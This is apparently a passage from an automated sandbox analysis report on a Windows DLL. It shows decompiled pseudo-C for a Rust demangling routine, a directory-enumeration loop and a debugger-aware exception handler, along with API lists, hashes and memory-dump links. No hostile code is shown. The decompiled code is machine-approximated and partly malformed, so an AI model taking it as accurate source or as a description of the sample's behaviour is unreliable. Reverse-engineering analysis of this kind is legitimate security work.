																	asm("enter 0x3, 0x0");
																	if( *_t155 <= 0) {
																		 *_t155 = _t155 +  *_t155;
																		 *_t203 =  *_t203;
																		__eflags =  *_t203;
																	}
																	_t76 = _t281 + 0x55000003;
																	 *_t76 =  *(_t281 + 0x55000003) + _t221;
																	__eflags =  *_t76;
																	_push(_t203);
																	_push(_t281);
																	_push(_t291);
																	_t313 = _t312 - 0x24;
																	__eflags =  *_t221 - 1;
																	_t282 = _t221;
																	if( *_t221 != 1) {
																		_t222 =  *(_t282 + 8);
																		_t292 =  *(_t282 + 0xc);
																		_t157 =  *(_t282 + 4);
																		__eflags = _t292 - _t222;
																		_t313[3] = _t222;
																		if(_t292 >= _t222) {
																			L53:
																			__eflags = _t157;
																			if(_t157 == 0) {
																				L67:
																				_t204 = 0;
																				goto L72;
																			} else {
																				_t313[1] = 0x56;
																				_t258 = 0;
																				__eflags = _t292 - _t313[3];
																				_t204 = 0;
																				 *_t313 = _t292;
																				if(_t292 >= _t313[3]) {
																					goto L72;
																				} else {
																					_t313[2] = _t157;
																					_t225 = 0;
																					__eflags = 0;
																					_t307 =  *_t313 + 1;
																					_t164 = _t313[2];
																					asm("o16 nop [cs:eax+eax]");
																					while(1) {
																						_t165 =  *(_t164 + _t307 - 1) & 0x000000ff;
																						__eflags = _t165 - 0x5f;
																						if(_t165 == 0x5f) {
																							break;
																						}
																						_t207 = _t165 + 0xd0;
																						__eflags = _t207 - 0xa;
																						if(__eflags < 0) {
																							L63:
																							_t295 = _t282;
																							 *(_t282 + 0xc) = _t307;
																							_t170 = _t225;
																							_t208 = _t207 & 0xffffff00 | __eflags > 0x00000000;
																							_t171 = _t170 * 0x3e;
																							_t258 = (_t170 * 0x3e >> 0x20) + _t258 * 0x3e;
																							if(__eflags != 0) {
																								_t204 = 0;
																								__eflags = 0;
																								goto L71;
																							} else {
																								_t204 = 0;
																								_t225 = _t171 + (_t208 & 0x000000ff);
																								__eflags = _t225;
																								asm("adc edx, 0x0");
																								if(_t225 < 0) {
																									L71:
																									_t282 = _t295;
																									goto L72;
																								} else {
																									__eflags = _t313[3] - _t307;
																									_t164 = _t313[2];
																									_t307 = _t307 + 1;
																									_t282 = _t295;
																									if(__eflags != 0) {
																										continue;
																									} else {
																										goto L72;
																									}
																								}
																							}
																						} else {
																							_t173 = _t165 + 0x9f;
																							__eflags = _t173 - 0x1a;
																							if(__eflags >= 0) {
																								_t175 = _t173 + 0xbf;
																								__eflags = _t175 - 0x1a;
																								if(_t175 >= 0x1a) {
																									goto L67;
																								} else {
																									_t176 = _t175 + 0xe3;
																									__eflags = _t176;
																									goto L62;
																								}
																							} else {
																								_t176 = _t173 + 0xa9;
																								L62:
																								_t207 = _t176;
																								goto L63;
																							}
																						}
																						goto L76;
																					}
																					_t204 = 0;
																					_t226 = _t225 + 1;
																					__eflags = _t226;
																					 *(_t282 + 0xc) = _t307;
																					asm("adc edx, 0x0");
																					if(_t226 < 0) {
																						goto L72;
																					} else {
																						_t292 =  *_t313;
																						goto L49;
																					}
																				}
																			}
																		} else {
																			__eflags = _t157;
																			if(_t157 == 0) {
																				goto L53;
																			} else {
																				__eflags =  *((char*)(_t157 + _t292)) - 0x5f;
																				if( *((char*)(_t157 + _t292)) != 0x5f) {
																					goto L53;
																				} else {
																					_t313[1] = 0x56;
																					_t226 = 0;
																					__eflags = 0;
																					 *(_t282 + 0xc) = _t292 + 1;
																					L49:
																					_t204 = 0;
																					__eflags = _t226 - _t292 - 1;
																					asm("sbb edx, 0x0");
																					if(_t226 >= _t292 - 1) {
																						L72:
																						_t223 =  *(_t282 + 0x14);
																						__eflags =  *(_t282 + 0x14);
																						if( *(_t282 + 0x14) == 0) {
																							L74:
																							 *_t282 = 1;
																							 *(_t282 + 1) = _t204;
																							goto L75;
																						} else {
																							__eflags = _t204;
																							_t257 =  !=  ? "{recursion limit reached}{invalid syntax}" :  &M6F27CB85;
																							_push((_t204 & 0x000000ff) + 0x10 + (_t204 & 0x000000ff) * 8);
																							_t162 = E6F231DE0(_t223,  !=  ? "{recursion limit reached}{invalid syntax}" :  &M6F27CB85);
																							_t313 =  &(_t313[1]);
																							_t158 = 1;
																							__eflags = _t162;
																							if(_t162 == 0) {
																								goto L74;
																							}
																						}
																					} else {
																						_t204 = 1;
																						_t167 =  *(_t282 + 0x10) + 1;
																						__eflags = _t167 - 0x1f4;
																						if(_t167 > 0x1f4) {
																							goto L72;
																						} else {
																							__eflags =  *(_t282 + 0x14);
																							if( *(_t282 + 0x14) == 0) {
																								goto L75;
																							} else {
																								asm("movsd xmm0, [edi]");
																								asm("movsd xmm1, [edi+0x8]");
																								 *_t282 = 0;
																								 *(_t282 + 0xc) = _t226;
																								 *(_t282 + 0x10) = _t167;
																								_t313[8] =  *(_t282 + 0x10);
																								__eflags = _t313[1];
																								asm("movsd [esp+0x18], xmm1");
																								asm("movsd [esp+0x10], xmm0");
																								_t158 = E6F236F50(_t282);
																								asm("movsd xmm0, [esp+0x10]");
																								asm("movsd xmm1, [esp+0x18]");
																								asm("movsd [edi], xmm0");
																								asm("movsd [edi+0x8], xmm1");
																								 *(_t282 + 0x10) = _t313[8];
																							}
																						}
																					}
																				}
																			}
																		}
																		goto L76;
																	} else {
																		_t232 =  *(_t282 + 0x14);
																		__eflags =  *(_t282 + 0x14);
																		if( *(_t282 + 0x14) == 0) {
																			L75:
																			_t158 = 0;
																			__eflags = 0;
																			L76:
																		} else {
																			_push(1);
																			_t158 = E6F231DE0(_t232, "?\'for<, >  as ::{shimclosure#[]dyn  + ; mut const  unsafe extern \"");
																		}
																	}
																	return _t158;
																}
															}
														}
													}
												} else {
													__eflags =  *((char*)(_t201 + _t291)) - 0xbf;
													if( *((char*)(_t201 + _t291)) <= 0xbf) {
														goto L38;
													} else {
														goto L13;
													}
												}
											}
										}
									}
								}
								goto L78;
							}
						}
						goto L19;
					}
				} else {
					_t249 =  *((intOrPtr*)(__ecx + 0x14));
					if( *((intOrPtr*)(__ecx + 0x14)) == 0) {
						L22:
						_t215 = 0;
						__eflags = 0;
					} else {
						_push(1);
						_t215 = E6F231DE0(_t249, "?\'for<, >  as ::{shimclosure#[]dyn  + ; mut const  unsafe extern \"");
					}
					L23:
					return _t215;
				}
				L78:
			}








































































                          0x6f2377b4
                          0x6f2377b5
                          0x6f2377d8
                          0x6f2377dc
                          0x6f2377df
                          0x6f2377e3
                          0x6f2377e7
                          0x6f2377e9
                          0x6f237946
                          0x6f237946
                          0x6f23794a
                          0x6f23794d
                          0x6f23794f
                          0x6f237966
                          0x6f237966
                          0x00000000
                          0x6f237951
                          0x6f237956
                          0x6f237958
                          0x6f237960
                          0x6f237962
                          0x6f237964
                          0x00000000
                          0x00000000
                          0x6f237964
                          0x00000000
                          0x6f2377ef
                          0x6f2377ef
                          0x6f2377f3
                          0x6f2377f6
                          0x6f2377f9
                          0x6f2377fb
                          0x6f2377ff
                          0x6f237803
                          0x6f237811
                          0x6f237815
                          0x6f23781a
                          0x6f23781a
                          0x6f23781b
                          0x6f237820
                          0x6f237823
                          0x6f237826
                          0x00000000
                          0x00000000
                          0x6f23782e
                          0x6f237833
                          0x6f237836
                          0x6f237837
                          0x6f23783a
                          0x6f23783d
                          0x6f237840
                          0x00000000
                          0x6f237842
                          0x6f237844
                          0x6f237847
                          0x6f23784a
                          0x00000000
                          0x6f23784c
                          0x6f23784c
                          0x6f23784f
                          0x00000000
                          0x6f237855
                          0x6f237855
                          0x6f237859
                          0x6f23785c
                          0x6f23785e
                          0x6f237860
                          0x6f237b65
                          0x6f237b72
                          0x6f237b77
                          0x6f237b7a
                          0x00000000
                          0x6f237866
                          0x6f237866
                          0x6f237868
                          0x6f237874
                          0x6f237874
                          0x6f23787a
                          0x6f23787e
                          0x6f237882
                          0x6f237886
                          0x6f23788b
                          0x6f237890
                          0x6f23797b
                          0x6f23797e
                          0x6f237980
                          0x00000000
                          0x6f237982
                          0x6f237989
                          0x6f23798b
                          0x6f237990
                          0x6f237993
                          0x6f237995
                          0x6f237997
                          0x00000000
                          0x6f237999
                          0x6f23799d
                          0x6f23799e
                          0x6f2379a3
                          0x6f2379a5
                          0x00000000
                          0x6f2379a5
                          0x6f237997
                          0x6f237896
                          0x6f23789a
                          0x6f23789d
                          0x6f23789f
                          0x00000000
                          0x6f2378a5
                          0x6f2378a5
                          0x6f2378a9
                          0x6f2378ad
                          0x6f2378b1
                          0x6f2378b8
                          0x6f2378bb
                          0x6f2379aa
                          0x6f2378c1
                          0x6f2378c1
                          0x6f2378c6
                          0x6f2378d0
                          0x6f2378d0
                          0x6f2378d6
                          0x6f2378e8
                          0x6f2378f3
                          0x6f237904
                          0x6f237919
                          0x6f237922
                          0x6f237924
                          0x6f237928
                          0x6f23792a
                          0x6f23793a
                          0x6f23793f
                          0x6f23793f
                          0x6f237944
                          0x6f2379af
                          0x6f2379b3
                          0x6f2379b6
                          0x6f2379b8
                          0x6f2379c6
                          0x6f2379d9
                          0x6f2379de
                          0x6f2379de
                          0x6f2379de
                          0x6f2379e1
                          0x6f2379e4
                          0x6f2379f7
                          0x6f2379fc
                          0x6f2379fc
                          0x6f2379e6
                          0x6f2379e8
                          0x6f2379ec
                          0x6f2379ec
                          0x6f237a0d
                          0x6f237a11
                          0x6f237a12
                          0x6f237a14
                          0x6f237a15
                          0x6f237a17
                          0x6f237a1c
                          0x6f237a1f
                          0x6f237a21
                          0x6f237a21
                          0x6f237a23
                          0x00000000
                          0x6f237a29
                          0x6f237a29
                          0x6f237a2c
                          0x00000000
                          0x6f237a32
                          0x6f237a36
                          0x6f237a39
                          0x6f237a3c
                          0x6f237a42
                          0x6f237a50
                          0x6f237a55
                          0x6f237a5c
                          0x6f237a5c
                          0x6f237b7c
                          0x6f237b7c
                          0x6f237b8b
                          0x6f237b90
                          0x6f237b93
                          0x6f237b98
                          0x6f237b9b
                          0x6f237ba1
                          0x6f237ba9
                          0x6f237bab
                          0x6f237bb7
                          0x6f237bbb
                          0x6f237bc3
                          0x6f237bc5
                          0x6f237bc7
                          0x6f237bcb
                          0x6f237bcf
                          0x6f237bd1
                          0x6f237bd3
                          0x6f237bd6
                          0x6f237bd8
                          0x6f237bdc
                          0x6f237be1
                          0x6f237be3
                          0x6f237be6
                          0x6f237be8
                          0x6f237be9
                          0x6f237beb
                          0x6f237bee
                          0x6f237bee
                          0x6f237bf0
                          0x6f237bf4
                          0x6f237bf6
                          0x6f237bf8
                          0x6f237bf8
                          0x6f237bf8
                          0x6f237bfb
                          0x6f237bfb
                          0x6f237bfb
                          0x6f237c01
                          0x6f237c02
                          0x6f237c03
                          0x6f237c04
                          0x6f237c07
                          0x6f237c0a
                          0x6f237c0c
                          0x6f237c2d
                          0x6f237c30
                          0x6f237c33
                          0x6f237c36
                          0x6f237c38
                          0x6f237c3c
                          0x6f237ce2
                          0x6f237ce2
                          0x6f237ce4
                          0x6f237da2
                          0x6f237da2
                          0x00000000
                          0x6f237cea
                          0x6f237cea
                          0x6f237cee
                          0x6f237cf0
                          0x6f237cf4
                          0x6f237cf9
                          0x6f237cfc
                          0x00000000
                          0x6f237d02
                          0x6f237d02
                          0x6f237d09
                          0x6f237d09
                          0x6f237d0b
                          0x6f237d0e
                          0x6f237d12
                          0x6f237d20
                          0x6f237d20
                          0x6f237d25
                          0x6f237d27
                          0x00000000
                          0x00000000
                          0x6f237d2b
                          0x6f237d2e
                          0x6f237d31
                          0x6f237d5e
                          0x6f237d65
                          0x6f237d67
                          0x6f237d73
                          0x6f237d75
                          0x6f237d78
                          0x6f237d7a
                          0x6f237d81
                          0x6f237dbb
                          0x6f237dbb
                          0x00000000
                          0x6f237d83
                          0x6f237d88
                          0x6f237d8a
                          0x6f237d8a
                          0x6f237d8c
                          0x6f237d8f
                          0x6f237dbd
                          0x6f237dbd
                          0x00000000
                          0x6f237d91
                          0x6f237d91
                          0x6f237d95
                          0x6f237d99
                          0x6f237d9c
                          0x6f237d9e
                          0x00000000
                          0x6f237da0
                          0x00000000
                          0x6f237da0
                          0x6f237d9e
                          0x6f237d8f
                          0x6f237d33
                          0x6f237d35
                          0x6f237d38
                          0x6f237d3b
                          0x6f237d52
                          0x6f237d55
                          0x6f237d58
                          0x00000000
                          0x6f237d5a
                          0x6f237d5a
                          0x6f237d5a
                          0x00000000
                          0x6f237d5a
                          0x6f237d3d
                          0x6f237d3d
                          0x6f237d5c
                          0x6f237d5c
                          0x00000000
                          0x6f237d5c
                          0x6f237d3b
                          0x00000000
                          0x6f237d31
                          0x6f237da6
                          0x6f237da8
                          0x6f237da8
                          0x6f237dab
                          0x6f237dae
                          0x6f237db1
                          0x00000000
                          0x6f237db3
                          0x6f237db3
                          0x00000000
                          0x6f237db3
                          0x6f237db1
                          0x6f237cfc
                          0x6f237c42
                          0x6f237c42
                          0x6f237c44
                          0x00000000
                          0x6f237c4a
                          0x6f237c4a
                          0x6f237c4e
                          0x00000000
                          0x6f237c54
                          0x6f237c54
                          0x6f237c5b
                          0x6f237c5d
                          0x6f237c5f
                          0x6f237c62
                          0x6f237c63
                          0x6f237c65
                          0x6f237c67
                          0x6f237c6a
                          0x6f237dbf
                          0x6f237dbf
                          0x6f237dc2
                          0x6f237dc4
                          0x6f237ded
                          0x6f237ded
                          0x6f237df0
                          0x00000000
                          0x6f237dc6
                          0x6f237dd0
                          0x6f237dd2
                          0x6f237ddc
                          0x6f237ddd
                          0x6f237de2
                          0x6f237de7
                          0x6f237de9
                          0x6f237deb
                          0x00000000
                          0x00000000
                          0x6f237deb
                          0x6f237c70
                          0x6f237c73
                          0x6f237c75
                          0x6f237c76
                          0x6f237c7b
                          0x00000000
                          0x6f237c81
                          0x6f237c81
                          0x6f237c85
                          0x00000000
                          0x6f237c8b
                          0x6f237c8e
                          0x6f237c92
                          0x6f237c97
                          0x6f237c9a
                          0x6f237c9f
                          0x6f237ca2
                          0x6f237ca8
                          0x6f237cad
                          0x6f237cb3
                          0x6f237cbc
                          0x6f237cc1
                          0x6f237cc7
                          0x6f237cd1
                          0x6f237cd5
                          0x6f237cda
                          0x6f237cda
                          0x6f237c85
                          0x6f237c7b
                          0x6f237c6a
                          0x6f237c4e
                          0x6f237c44
                          0x00000000
                          0x6f237c0e
                          0x6f237c0e
                          0x6f237c11
                          0x6f237c13
                          0x6f237df3
                          0x6f237df3
                          0x6f237df3
                          0x6f237df5
                          0x6f237c19
                          0x6f237c1e
                          0x6f237c20
                          0x6f237c25
                          0x6f237c13
                          0x6f237dfc
                          0x6f237dfc
                          0x6f237a2c
                          0x6f237a23
                          0x6f23789f
                          0x6f23786a
                          0x6f23786a
                          0x6f23786e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23786e
                          0x6f237868
                          0x6f237860
                          0x6f23784f
                          0x6f23784a
                          0x00000000
                          0x6f237840
                          0x6f237820
                          0x00000000
                          0x6f237803
                          0x6f2377b7
                          0x6f2377b7
                          0x6f2377bc
                          0x6f23796b
                          0x6f23796b
                          0x6f23796b
                          0x6f2377c2
                          0x6f2377c7
                          0x6f2377d1
                          0x6f2377d1
                          0x6f23796d
                          0x6f237976
                          0x6f237976
                          0x00000000

                          APIs
                          Strings
                          • ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6F2377C2, 6F237C19
                          • called `Option::unwrap()` on a `None` value, xrefs: 6F237B7C
                          • {recursion limit reached}{invalid syntax}, xrefs: 6F237DC6
                          • bool, xrefs: 6F237A4B
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: __aulldiv__aullrem
                          • String ID: ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$bool$called `Option::unwrap()` on a `None` value${recursion limit reached}{invalid syntax}
                          • API String ID: 3839614884-433696047
                          • Opcode ID: a547752b926dc6b9854c29963db587fb943bca5d347b0ccbae457853551b18b0
                          • Instruction ID: 5032b97112508b2ab27809f7799454c8f97e87f89bb0db78f1c33a04932ec3e5
                          • Opcode Fuzzy Hash: a547752b926dc6b9854c29963db587fb943bca5d347b0ccbae457853551b18b0
                          • Instruction Fuzzy Hash: 6CE114F2A0C36ACFDB05CF28C49076AB7E1AF86314F04866ED4998B395D734A845CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F250AA5, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 71%
                          			E6F250AA5(void* __eax, void* __ecx, intOrPtr __edx) {
				void* __ebx;
				void* __edi;
				signed int _t43;
				signed int _t49;
				signed int _t55;
				signed int _t58;
				signed int _t59;
				signed int _t61;
				intOrPtr* _t67;
				signed int _t70;
				union _FINDEX_INFO_LEVELS _t79;
				void* _t80;
				signed int _t88;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				signed int _t96;
				signed int _t97;
				void* _t99;
				void* _t100;

				_t91 = __edx;
				 *((intOrPtr*)(__eax + 0x57))();
				_t43 = E6F25078D(__ecx);
				_t100 = _t99 + 0xc;
				_t82 = _t97 - 0x254;
				asm("sbb eax, eax");
				_t94 = FindFirstFileExW( !( ~_t43) &  *(_t97 - 0x284), _t79, _t97 - 0x254, _t79, _t79, _t79);
				if(_t94 != 0xffffffff) {
					_t83 =  *((intOrPtr*)(_t97 - 0x25c));
					_t49 =  *((intOrPtr*)( *((intOrPtr*)(_t97 - 0x25c)) + 4)) -  *((intOrPtr*)( *((intOrPtr*)(_t97 - 0x25c))));
					__eflags = _t49;
					 *(_t97 - 0x294) = _t49 >> 2;
					do {
						 *(_t97 - 0x274) = _t79;
						 *(_t97 - 0x270) = _t79;
						 *(_t97 - 0x26c) = _t79;
						 *(_t97 - 0x268) = _t79;
						 *(_t97 - 0x264) = _t79;
						 *(_t97 - 0x260) = _t79;
						_t55 = E6F2506C7(_t97 - 0x228, _t97 - 0x274, _t97 - 0x255, E6F250D2C(_t91, __eflags));
						_t100 = _t100 + 0x10;
						asm("sbb eax, eax");
						_t58 =  !( ~_t55) &  *(_t97 - 0x26c);
						__eflags =  *_t58 - 0x2e;
						if( *_t58 != 0x2e) {
							L9:
							_push( *((intOrPtr*)(_t97 - 0x25c)));
							_t59 = L6F250927(_t83, _t58, _t92,  *((intOrPtr*)(_t97 - 0x290)));
							_t100 = _t100 + 0x10;
							 *(_t97 - 0x298) = _t59;
							__eflags = _t59;
							if(_t59 != 0) {
								__eflags =  *(_t97 - 0x260) - _t79;
								if( *(_t97 - 0x260) != _t79) {
									E6F2505C3( *(_t97 - 0x26c));
								}
								FindClose(_t94);
								__eflags =  *((intOrPtr*)(_t97 - 0x278)) - _t79;
								if( *((intOrPtr*)(_t97 - 0x278)) != _t79) {
									E6F2505C3( *(_t97 - 0x284));
								}
								_t61 =  *(_t97 - 0x298);
							} else {
								goto L10;
							}
						} else {
							_t83 =  *((intOrPtr*)(_t58 + 1));
							__eflags = _t83;
							if(_t83 == 0) {
								goto L10;
							} else {
								__eflags = _t83 - 0x2e;
								if(_t83 != 0x2e) {
									goto L9;
								} else {
									__eflags =  *((intOrPtr*)(_t58 + 2)) - _t79;
									if( *((intOrPtr*)(_t58 + 2)) == _t79) {
										goto L10;
									} else {
										goto L9;
									}
								}
							}
						}
						goto L23;
						L10:
						__eflags =  *(_t97 - 0x260) - _t79;
						if( *(_t97 - 0x260) != _t79) {
							E6F2505C3( *(_t97 - 0x26c));
							_pop(_t83);
						}
						__eflags = FindNextFileW(_t94, _t97 - 0x254);
					} while (__eflags != 0);
					_t67 =  *((intOrPtr*)(_t97 - 0x25c));
					_t88 =  *(_t97 - 0x294);
					_t91 =  *_t67;
					_t70 =  *((intOrPtr*)(_t67 + 4)) -  *_t67 >> 2;
					__eflags = _t88 - _t70;
					if(_t88 != _t70) {
						__eflags = _t70 - _t88;
						E6F2531C0(_t91, _t91 + _t88 * 4, _t70 - _t88, 4, E6F2505FD);
					}
					FindClose(_t94);
					__eflags =  *((intOrPtr*)(_t97 - 0x278)) - _t79;
					if( *((intOrPtr*)(_t97 - 0x278)) != _t79) {
						E6F2505C3( *(_t97 - 0x284));
					}
					_t61 = 0;
				} else {
					_push( *((intOrPtr*)(_t97 - 0x25c)));
					_t96 = L6F250927(_t82, _t92, _t79, _t79);
					if( *((intOrPtr*)(_t97 - 0x278)) != _t79) {
						E6F2505C3( *(_t97 - 0x284));
					}
					_t61 = _t96;
				}
				L23:
				_pop(_t95);
				_pop(_t93);
				_pop(_t80);
				return E6F24A057(_t61, _t80,  *(_t97 - 4) ^ _t97, _t91, _t93, _t95);
			}
























                          0x6f250aa5
                          0x6f250aa5
                          0x6f250aa8
                          0x6f250aad
                          0x6f250ab0
                          0x6f250ab8
                          0x6f250ace
                          0x6f250ad3
                          0x6f250b03
                          0x6f250b0c
                          0x6f250b0c
                          0x6f250b11
                          0x6f250b17
                          0x6f250b17
                          0x6f250b1d
                          0x6f250b23
                          0x6f250b29
                          0x6f250b2f
                          0x6f250b35
                          0x6f250b56
                          0x6f250b5b
                          0x6f250b60
                          0x6f250b64
                          0x6f250b6a
                          0x6f250b6d
                          0x6f250b80
                          0x6f250b80
                          0x6f250b8e
                          0x6f250b93
                          0x6f250b96
                          0x6f250b9c
                          0x6f250b9e
                          0x6f250c19
                          0x6f250c1f
                          0x6f250c27
                          0x6f250c2c
                          0x6f250c2e
                          0x6f250c34
                          0x6f250c3a
                          0x6f250c42
                          0x6f250c47
                          0x6f250c48
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f250b6f
                          0x6f250b6f
                          0x6f250b72
                          0x6f250b74
                          0x00000000
                          0x6f250b76
                          0x6f250b76
                          0x6f250b79
                          0x00000000
                          0x6f250b7b
                          0x6f250b7b
                          0x6f250b7e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f250b7e
                          0x6f250b79
                          0x6f250b74
                          0x00000000
                          0x6f250ba0
                          0x6f250ba0
                          0x6f250ba6
                          0x6f250bae
                          0x6f250bb3
                          0x6f250bb3
                          0x6f250bc2
                          0x6f250bc2
                          0x6f250bca
                          0x6f250bd0
                          0x6f250bd6
                          0x6f250bdd
                          0x6f250be0
                          0x6f250be2
                          0x6f250be9
                          0x6f250bf2
                          0x6f250bf7
                          0x6f250bfb
                          0x6f250c01
                          0x6f250c07
                          0x6f250c0f
                          0x6f250c14
                          0x6f250c15
                          0x6f250ad5
                          0x6f250ad5
                          0x6f250ae6
                          0x6f250aee
                          0x6f250af6
                          0x6f250afb
                          0x6f250afc
                          0x6f250afc
                          0x6f250c4e
                          0x6f250c4e
                          0x6f250c52
                          0x6f250c55
                          0x6f250c5c

                          APIs
                          • FindFirstFileExW.KERNEL32(?,?,?), ref: 6F250AC8
                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?), ref: 6F250BBC
                          • FindClose.KERNEL32(00000000,?,?,?,?,?), ref: 6F250C2E
                          • FindClose.KERNEL32(00000000,?,?,?,?,?), ref: 6F250BFB
                            • Part of subcall function 6F2505C3: HeapFree.KERNEL32(00000000,00000000,?,6F254F77,?,00000000,?,?,6F254F9C,?,00000007,?,?,6F253037,?,?), ref: 6F2505D9
                            • Part of subcall function 6F2505C3: GetLastError.KERNEL32(?,?,6F254F77,?,00000000,?,?,6F254F9C,?,00000007,?,?,6F253037,?,?), ref: 6F2505E4
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Find$CloseFile$ErrorFirstFreeHeapLastNext
                          • String ID:
                          • API String ID: 2537390918-0
                          • Opcode ID: c80fc0ec655f0e8f00e6e101abc79511ed5f46cfe52cad07ed1ef02dde8edb34
                          • Instruction ID: 90998287fd0c2ecdf193d89d5d29042630bbec373c80c8a04c32fa7477ac57da
                          • Opcode Fuzzy Hash: c80fc0ec655f0e8f00e6e101abc79511ed5f46cfe52cad07ed1ef02dde8edb34
                          • Instruction Fuzzy Hash: C04180B190512F9FDF21DB34CC98EEAB774AF0521DF1451D5E009A7191EB329EA48F50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24AB0C, Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                          Download Yara Rule
                          C-Code - Quality: 85%
                          			E6F24AB0C(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E6F24AC27(_t34);
				 *_t60 = 0x2cc;
				_v632 = E6F24C310(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E6F24C310(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E6F24AC27(_t49);
				}
				return _t49;
			}


































                          0x6f24ab0c
                          0x6f24ab0c
                          0x6f24ab0c
                          0x6f24ab20
                          0x6f24ab22
                          0x6f24ab25
                          0x6f24ab25
                          0x6f24ab29
                          0x6f24ab2e
                          0x6f24ab46
                          0x6f24ab4c
                          0x6f24ab52
                          0x6f24ab58
                          0x6f24ab5e
                          0x6f24ab64
                          0x6f24ab6a
                          0x6f24ab71
                          0x6f24ab78
                          0x6f24ab7f
                          0x6f24ab86
                          0x6f24ab8d
                          0x6f24ab94
                          0x6f24ab95
                          0x6f24ab9e
                          0x6f24aba4
                          0x6f24aba7
                          0x6f24abad
                          0x6f24abbc
                          0x6f24abc8
                          0x6f24abd3
                          0x6f24abda
                          0x6f24abe1
                          0x6f24abec
                          0x6f24abf4
                          0x6f24abfd
                          0x6f24abff
                          0x6f24ac02
                          0x6f24ac04
                          0x6f24ac0e
                          0x6f24ac16
                          0x6f24ac1c
                          0x00000000
                          0x6f24ac23
                          0x6f24ac26

                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6F24AB18
                          • IsDebuggerPresent.KERNEL32 ref: 6F24ABE4
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6F24AC04
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 6F24AC0E
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                          • String ID:
                          • API String ID: 254469556-0
                          • Opcode ID: 0b5fcdf69df5ffdd97ab81467103da97f908ccc29625b442891ddb70ad4d7709
                          • Instruction ID: 3195f4dd3e7bbfac1357df6c44320e3e8480dd052079bf560f61e9ea1ed615b5
                          • Opcode Fuzzy Hash: 0b5fcdf69df5ffdd97ab81467103da97f908ccc29625b442891ddb70ad4d7709
                          • Instruction Fuzzy Hash: AA311AB5D4531D9BDF51DF64D989BCCBBB8AF08704F1040AAE40DAB280EBB45A88CF44
                          Uniqueness

                          Uniqueness Score: -1.00%

